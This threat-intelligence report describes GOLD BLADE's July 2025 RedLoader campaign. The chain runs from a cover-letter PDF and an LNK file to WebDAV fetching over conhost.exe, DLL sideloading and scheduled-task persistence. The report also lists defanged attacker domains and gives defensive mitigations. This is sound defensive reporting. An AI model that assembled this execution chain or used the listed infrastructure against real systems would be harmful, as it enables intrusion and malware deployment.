Full Report
Attacks surged in July 2025 after the threat group updated its process to combine malicious LNK files and a recycled WebDAV technique
Analysis Summary
# Threat Actor: GOLD BLADE
## Attribution & Identity
* **Identification/Association:** Cybercriminal group known to utilize custom malware, specifically RedLoader. The article references external threat profile information about GOLD BLADE.
## Activity Summary
* **Recent Campaign (July 2025):** Attacks surged after the group updated its infection chain to combine malicious LNK files and a recycled WebDAV technique, leading to the deployment of RedLoader stage 1.
* **Historical Activities:**
* September 2024: Observed using WebDAV to execute remotely hosted DLLs.
* March 2025: Observed sideloading a renamed `ADNotificationManager.exe` file.
* The July 2025 activity represents a novel combination of these previously observed techniques for initial execution.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Delivery via a PDF containing a malicious link, downloading a ZIP archive with a LNK file masquerading as a PDF.
- **Execution:** LNK file executes `conhost.exe`.
- **Remote Execution/Sideloading:** `conhost.exe` leverages **WebDAV** to contact an attacker-controlled CloudFlare domain and download a renamed, benign version of `Adobe ADNotificationManager.exe`. This benign executable remotely **sideloads** the malicious RedLoader stage 1 DLL (`netutils.dll`).
- **Persistence/Staging:** RedLoader stage 1 creates a scheduled task named `BrowserQE\BrowserQE __` on the victim system.
- **Execution (Stage 2):** The scheduled task uses `PCALua.exe` and `conhost.exe` to execute RedLoader stage 2 (`BrowserQE_ __.exe`).
- **Defense Evasion:** Use of legitimate-looking executables (`ADNotificationManager.exe` used as a dropper) and scheduled tasks for execution.
- **MITRE ATT&CK IDs (Inferred from provided detection names):**
* Detection `WIN-DET-EVADE-HEADLESS-CONHOST-EXECUTION-1` suggests monitoring for suspicious child processes of `conhost.exe`.
## Targeting
- **Sectors:** Not explicitly detailed, but the initial vector involves a "well-crafted cover letter PDF" targeting a "target via a third-party job site such as ‘indeed.com’," suggesting business email compromise (BEC) or broad phishing campaigns aimed at initial access into organizations seeking employment context.
- **Geography:** Not specified in the provided text.
- **Victims:** No specific organizations named, though the execution chain utilized victim-specific names for the Stage 2 executable (`BrowserQE_ __.exe`).
## Tools & Infrastructure
- **Malware Families Used:** RedLoader (Stage 1 and Stage 2 custom executables).
- **Infrastructure (C2/Hosting):**
* Initial C2/Hosting via CloudFlare workers: `automatinghrservices[.]workers[.]dev`
* Remote hosted executable location (WebDAV): `dav[.]automatinghrservices[.]workers[.]dev @ SSL\DavWWWRoot\CV-APP-2012-68907872.exe`
* Stage 2 download location: `live[.]airemoteplant[.]workers[.]dev`
## Implications
The threat actor, GOLD BLADE, demonstrates adaptability by combining previously observed infection vectors (WebDAV and DLL sideloading) into a novel, multi-stage initial execution chain. This modification in technique poses a new challenge for defenses relying on detection patterns established from earlier, separate observations. Their reliance on LNK files and common system processes like `conhost.exe` highlights evasion techniques post-initial delivery.
## Mitigations
- **Policy Enforcement:** Deploy a Software Restriction Policy Group Policy Object (GPO) to block LNK file execution from common malware-leveraged directories:
* `C:\Users\*\Downloads\*.lnk`
* `%AppDataLocal%\*.lnk`
* `%AppDataRoaming%\*.lnk`
- **Endpoint Detection:** Deploy protections that specifically block DLL sideloading attempts involving known malicious binaries (e.g., Sophos detection `Evade_28k` which blocks specific versions of `adnotificationmanager.exe` from DLL sideloading).
- **Behavioral Monitoring:** Monitor for suspicious child processes spawned by `conhost.exe`, specifically excluding known benign processes like `\Windows\System32\WerFault.exe`.